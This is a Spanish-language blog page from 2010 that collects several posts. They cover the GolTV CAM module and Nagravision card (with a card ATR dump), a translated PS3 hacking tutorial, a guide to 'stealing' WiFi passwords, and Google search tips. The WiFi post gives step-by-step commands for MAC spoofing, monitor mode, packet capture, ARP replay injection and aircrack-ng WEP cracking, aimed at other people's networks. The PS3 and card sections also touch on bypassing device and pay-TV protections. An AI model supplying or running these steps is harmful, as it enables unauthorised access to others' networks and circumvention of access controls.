La PCMCIA o CAM es el módulo que se podrá introducir en una iDTV (Tú televisor Plasma o LCD) y en un deco con Slot de PCMCIA ya sea TDT o Combo. El Módulo lo fabricará SIDSA y no SAMSUMG como venia haciendolo hasta ahora para AXIL. En este Módulo además se deberá introducir la tarjeta de GolTV en este caso u otro en el caso de canales de PPV de otros difusores. Una CAM puede ser MultiCas o sencillamente disponer de una sola CAS. CAS es el sistema de acceso condicional empleado, en el caso de GolTV es Nagravision. Pueden ir sobre la misma señal varios sistemas mas. Multicas leeria varios sistemas, sólo bastaria con cambiar de tarjeta. La CAM se cambiaria sólo en caso de emplear varios CAS, pero Sidsa prevé a su CAM de actualización vía OTA, es decir, se actualiza sola a través de la señal de la antena.



Leyenda:
A - Tarjeta de abonado (por ejemplo a Gol TV).
B - Módulo CAM.
C - Ranura Common Interface (CI)
Ranura Common Interface (CI, ranura de interfaz común):
•¿Dónde encontrarla? En televisores de última generación, LCD y plasmas, fabricados en los tres o cuatro últimos años. Esta ranura puede situarse en el lateral del televisor o bien en el panel trasero directamente. Suele venir indicada como “Common Interface”, aunque esto varía según el modelo.
•En esta ranura podremos insertar el módulo adaptador CAM que nos permite introducir la tarjeta de abonado de Gol TV.
•Es imprescindible que nuestra televisión posea esta ranura para comprar la CAM, si no, habrá que optar por un decodificador que incorpore la ranura.



Módulo CAM:
•El módulo CAM es un adaptador para tarjetas como la que Mediapro prepara para Gol TV



•Tarjeta Gol TV : la tarjeta del canal se introduce en el adaptador CAM. Poco se sabe salvo que vendrá codificada (usará la codificación Nagravision CAS 18xx), muy probablemente, por el sistema Nagravision.



•En la imagen se pueden ver las diferentes tarjetas recargables de Nagravision ( Sin el logo de golTV) que podrían ser usadas en España. Como se puede ver son tarjetas de pago de eventos y contienen diferentes cantidades de recarga. Estas tarjetas podrán adquirirse en comercios del ramo, etc.








Hace algunos días ya hablamos de la CAM de GolTV, ahora le toca el turno a la tarjeta. Dicha tarjeta es Nagravision y viene contemplada aquí, donde se puede ver que es posible realizar un prepago o suscripción corta y larga (Tiempo), asi como pago por evento o pago impulsivo (de repente e inmediato a un servicio temporal) aunque los formatos vienen definidos a las necesidades del Canal.

Esta tarjeta contiene diferentes cantidades de credito variables según se puede observar en el documento que han subido. La tarjeta trabaja bien con la CAM de Kudelski que no es otra que la SmartDTV. Soporta el formato Simulcript y explican que se puede activar desde un mensaje SMS o a través de una WEB de activación. Dicha tarjeta se ofrece como “anonima” pues es activada o no sin dar los datos del abonado, aunque en GolTV han elegido la opción de rellenar un formulario que ya te vincula con la tarjeta, eso si, queda de tu propiedad.

NO explican nada de que generación pertenece dicha tarjeta si es ROM 180 o inferior o 190 o superior. NO especifican ningún otro dato de la misma por lo que no hay carácteristicas de la misma, salvo que es una tarjeta diferente a las conocidas Nagra 3 aunque sea el mismo sistema (Seguridad). Sólo sabemos, que en España, aparece como CAID 1812 y que Abertis la tiene como tarjeta comodin además de la de GolTV, una tarjeta con mas opciones a mas canales de pago en la misma


---------------------------------

Iremos dejando lo que salga de Gol tv, por aqui:

ATR String: 3F FF 95 00 FF 91 81 71 FE 47 00 54 49 47 45 52
36 30 31 20 52 65 76 4D 38 30 13
ROM Revisión: 601
EEPROM Revisión: RevM80
Error, tipo de tarjeta no soportado
Exito Cerrando COM1

un saludo a todos

jueves, 27 de mayo de 2010

Como hackear la PS3

Pues ahora vi un tutorial de como hackear la Playstation 3, el tutorial lo encuentran aqui en inglés pero yo traduci el tutorial para los que no saben inglés. No esta muy facil pero son los primeros pasos de hackear esta consola que es la que faltaba en esta generación, sin más aquí el tutorial (mix.pe o msakiya no se responsabilizan si tu PS3 se daña con el procedimiento) (este tutorial no es 100% seguro, tu consola corre mucho riesgo que se dañe, asi que piensalo bien) (para todos los demás, adelante):

Este tutorial es original de AOTC

Esto no ha sido probado por completo con todos los juego,COD3 y Warhawk funcionaron otros vienen probandolos.

Nosotros somos un grupo nuevo AOTC y nosotros somos miembros de maxconsole.com, nosotros estamos enfermos de falsas informaciones en espera.

Entonces aqui está eso…. PSPMate y Saltynuts por favor mantenganos informados si ustedes prueban nuevas cosas…
Nosotros no nos hacemos responsables de algun **** con sus PS3…

Primero de todo este hack es el mismo de SKFU (bien hecho)

para mas información mirar el video

Aqui como lo debes hacer Tu necesitas 2 discos duros estos deben ser del mismo tamaño (ejemplo: 2 de 80gb o 2 de 60gb) Instalar uno de los discos duros en la PS3 y formatealo, después instala el juego de Warhawk por completo y reinicia el juego.

Ahora apaga la PS3 y saca el disco duro.

((Ahora hay que ser un poco inteligente – pasale el programa Winhex y clona el disco duro con el que sacaste de la PS3))

Usa una PC para clonar

Ok después de algunas horas de copiar, inserta el disco duro devuelta dentro de la PS3 y enciendelo.

Ahora inserta el disco de Warhawk y espera por el archivo .png se muestre, justo ahora saca el disco duro y cambia el disco de Warhawk por el de Motorstorm y el disco duro que tu clonaste.

Reinserta el disco duro y el disco de Motorstorm y el disco arrancará como un proxy.

martes, 25 de mayo de 2010

Como sacar o "robar" contraseñas WiFi con Backtrack 3

El día de hoy, vamos a ver como sacar contraseñas WiFi, en este caso una contraseña con encriptación WEP.

Lo primero que debemos hacer es descargar Backtrack 3. Descagar Aquí
Luego grabamos la imagen en un CD, para esto podemos utilizar un programa gratuito como ISO recorder 2.0. Descargar Aquí
Una vez con el cd grabado, reiniciamos el computador y ponemos el cd para que arranque BackTrack 3.



4 Luego abrimos una consola (shell) con el icono que está al lado de la “K” de la esquina inferior izquierda.
5 Detenemos nuestra tarjeta de Red (En este caso una Atheros por lo tanto es ath0)
Escribimos: airmon-ng stop ath0



6 Para continuar, cambiamos nuestra MAC (Media Access Control), para ser “ocultados”.
Escribimos: macchanger -m 11:22:33:44:55:66 wifi0



7 Iniciamos nuestra tarjeta de Red en modo Monitor.
Escribimos: airmon-ng start wifi0



8 Ahora nos aseguraremos que todo vaya bien, revisaremos la MAC cambiada y que la tarjeta esté en modo Monitor.
Escribimos: iwconfig



9 Ahora, a revisar si hay redes cerca nuestro.
Escribimos: airodump-ng wifi0



10 Anotemos datos muy importantes de la pantalla anterior, como lo son:
La MAC de la red (BSSID)
El canal por donde se transmite la red WiFi (CH)
El nombre de la red (ESSID)

11 Presionamos CTRL+C y así se detendrá la búsqueda de redes cercanas.
Luego escribimos: airodump-ng –channel X –write XXX ath0
x= Canal (CH)
xxx= Nombre para guardar el archivo con información, pongan cualquier nombre, en este caso “pass”
Para este ejemplo sería: airodump-ng –channel 5 –write pass ath0



12 Ahora abrimos otra ventana de consola (Shell).
Escribimos lo siguiente: aireplay-ng -3 -b (mac de la red) -h (nuestra mac) ath0



13 Volvemos a abrir otra ventana de consola (Shell)
Ahora escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0



14 Ahora debemos esperar a que se obtenga la información suficiente como para saber la contraseña de la red, para esto tenemos que esperar a que los ARP sean altos (más de 50.000).

15 Una vez que tengamos suficiente información (lo sabrás con experiencia, muchos intentos, todo depende de la dificultad de la contraseña), cancelamos lo que teníamos andando presionando CTRL+C en cada consola (Shell).

16 Luego iniciamos otro programa para que desencripte la contraseña.
Escribimos: Aircrack-ng pass-01.cap



Finalmente, ya tenemos la contraseña de la red. BackTrack 3 ha funcionado.

Aclaraciones: Debido a problemas con mi máquina virtual, no he podido poner mis propias imágenes, agradezco este tutorial encontrado en Internet. A pesar de que no son mis imágenes, si he hecho estos pasos pero con una tarjeta Ralink.

Cualquier duda escribe comentarios o lo ke sea
saludos

Vínculo de descarga: DESCARGAR BACKTRACK 3

sábado, 22 de mayo de 2010

Trucos de google

A veces nos quebramos la cabeza cuando no encontramos en la red alguna información o página web, así que acá te dejo unos trucos para darle mejores instrucciones a los robots de búsqueda y tener los resultados deseados.



Dejar de omitir palabras en la búsqueda


Google omite palabras comunes como el, la, los, de, con, como medio de filtro y evitar resultados 'sucios' pero si quieres que estas palabras las incluya Google en los resultados debes poner el signo de más (+) antes de la palabra omitida.
Por ejemplo: +la mujer +de rojo




Omitir palabras en la búsqueda


Por el contrario, si deseas que los resultados NO muestren palabras que estén relacionadas con la búsqueda, entonces antepon el signo de menos (-) antes de la palabra.
Por ejemplo: videos -gratis
De este modo omitirá los sitios que anuncien videos gratis.




Usar comodines


Si no recuerdas una palabra dentro de una frase puedes usar un comodín para que los motores de búsqueda te den sugerencias. Esto lo logras usando un asterisco (*) entre las palabras que sí recuerdas.
Por ejemplo: ipod * generación



Buscar frases exactas


Si quieres buscar una frase exacta y omitir los resultados que usen estas palabras por separado usa comillas simples (')antes y después de la frase.
Por ejemplo: 'caricaturas japonesas'



Buscar palabras dentro de un sitio


Si quieres hacer una búsqueda dentro de un dominio usa el comando site para que dé los resultados encontrados en un dominio específico.
Por ejemplo: site:www.mercadolibre.com.mx iphone
Te dará todos los resultados donde encontró la palabra iphone dentro de MercadoLibre.




Diccionario rápido


Para saber el significado de una palabra (en tu mismo idioma) utiliza el comando define para que te dé su significado.
Por ejemplo: define:ornamenta


Buscar información de un sitio


Para encontrar la información de la página principal de un sitio usa el comando info para que despliegue un sólo resultado con la información de la web.
Por ejemplo: info:www.youtube.com


Ver una página como se mostraba antes


Los sitios guardan un caché dentro de los buscadores, esto es, que guarda la página con la información de ese día, aunque después esa información sea modificada.
Si quieres ver cómo se mostraba la página la última vez que fue guardado el caché usa el comando cache.
Por ejemplo: cache:www.nokia.com


Encontrar archivos en una página


El comando filetype te ayudará a encontrar archivos en un sitio.
Por ejemplo: filetype:doc tutorial
Mostrará todos las páginas que dentro de sus sitios tengan un archivos llamado tutorial.doc